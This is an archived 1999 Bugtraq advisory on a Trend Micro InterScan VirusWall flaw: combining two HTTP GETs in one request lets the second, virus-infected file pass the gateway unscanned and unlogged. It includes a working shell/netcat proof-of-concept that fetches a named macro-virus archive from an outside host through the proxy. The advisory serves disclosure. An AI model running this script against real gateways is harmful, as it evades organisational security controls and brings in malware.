Bugtraq mailing list archives
BlackHats Advisory -- InterScan VirusWall
From: unicorn () BLACKHATS ORG (The Unicorn)
Date: Mon, 22 Feb 1999 21:31:51 +0100
BlackHats Security Advisory Release date: February 22, 1999 Application: InterScan Viruswall for Solaris Severity: Any user can download binaries and virus infected files though the VirusWall Author(s): s10 () blackhats org, unicorn () blackhats org --- Overview: --- InterScan VirusWall is part of Trend Micro's integrated family of virus protection products that covers every access point - Internet gateways, groupware, e-mail and intranet servers, LAN servers, and desktops. InterScan VirusWall scans inbound and outbound SMTP mail and attachments, FTP and HTTP traffic in real time. It automatically cleans infected files and detects malicious Java applets and ActiveX objects. When two HTML GET commands are combined in one request, of wich the former points to a non-scanned file like a graphic image (i.e. a GIF file) and the latter to a possibly infected binary or macro file, both of the files are passed to the user requesting the data without any warning or logging by the VirusWall. We found that this combination was sometimes generated by well-known web browsers like Netscape Communicator and Microsoft Internet Explorer during normal use. We informed Trend Micro of this vulnerability more than three weeks ago. We fully described the problem to Trend Engineering and included an exploit similar to the one described below and all traffic between the browser and VirusWall, but did not receive a fix for this problem. The explanation received was that they were unable to reproduce it on their systems. Since these systems are used to protect people behind (expensive) firewall configurations against virus infection, we decided to make, at least, the administrators of these systems aware of this exploit that can be used by users behind an InterScan VirusWall configuration to circumvent the implemented security policy. --- Affected systems: --- InterScan Viruswall for Solaris Implementations of InterScan VirusWall on other platforms are likely to be vulnerable, but are not tested since we do not have them available --- Workarounds/Fixes: --- We have not yet received a fix from Trend Micro. It might be possible to close this hole by scanning *ALL* data passed in HTTP traffic, but this will have a negative influence on the throughput of the complete firewall configuration. --- Example: --- We developed the following exploit that requests two files in one message. The first one is a simple graphic file (in this case form the Trend Micro web-site) and the second one is a file containing a well known macro-virus, which would normally be detected and removed by the product. Using the netcat tool we send this combined request out to the world using the VirusWall as a proxy-server. The information received back is stored in a file. When later examining the file we find both the graphic and the virus infected contents requested. Looking through the logfiles no trace is found of this file seeping through the hole. #!/bin/sh echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0 Referer: http://www.antivirus.com/index.html Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.5 [en] (WinNT; I) Host: www.antivirus.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0 Referer: http://sourceofkaos.com/homes/knowdeth/index.html Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.5 [en] (WinNT; I) Host: sourceofkaos.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 " | nc viruswall 80 > the.results Changing the second part of this "code" will enable downloading any information through the Trend Micro InterScan VirusWall. Probably because the product only acts on the first GET command in a message, while retrieving all information requested. --- Further Study: --- Further study of this vulnerability may focus on FTP and SMTP traffic and the detection of malicious Java applets and ActiveX objects. Ciao, Unicorn. -- ======= _ __,;;;/ TimeWaster ================================================ ,;( )_, )~\| A Truly Wise Man Never Plays ;; // `--; Leapfrog With A Unicorn... ==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======
Current thread:
- Group kmem exploitable?, (continued)
- Group kmem exploitable? Oliver Xymoron (Feb 23)
- Re: Pro/wuFTPD DoS Alex Belits (Feb 21)
- ISS install.iss security hole Fyodor (Feb 20)
- Re: ISS install.iss security hole Joel Eriksson (Feb 22)
- Preventing remote OS detection Patrick Gilbert (Feb 22)
- Re: Preventing remote OS detection James Lockwood (Feb 22)
- Re: Preventing remote OS detection route () RESENTMENT INFONEXUS COM (Feb 22)
- Re: Preventing remote OS detection Salvatore Sanfilippo (Feb 23)
- Re: ISS install.iss security hole Peter Benie (Feb 22)
- Re: ISS install.iss security hole Michael Warfield (Feb 22)
- BlackHats Advisory -- InterScan VirusWall The Unicorn (Feb 22)
- Microsoft Security Bulletin (MS99-007) aleph1 () UNDERGROUND ORG (Feb 22)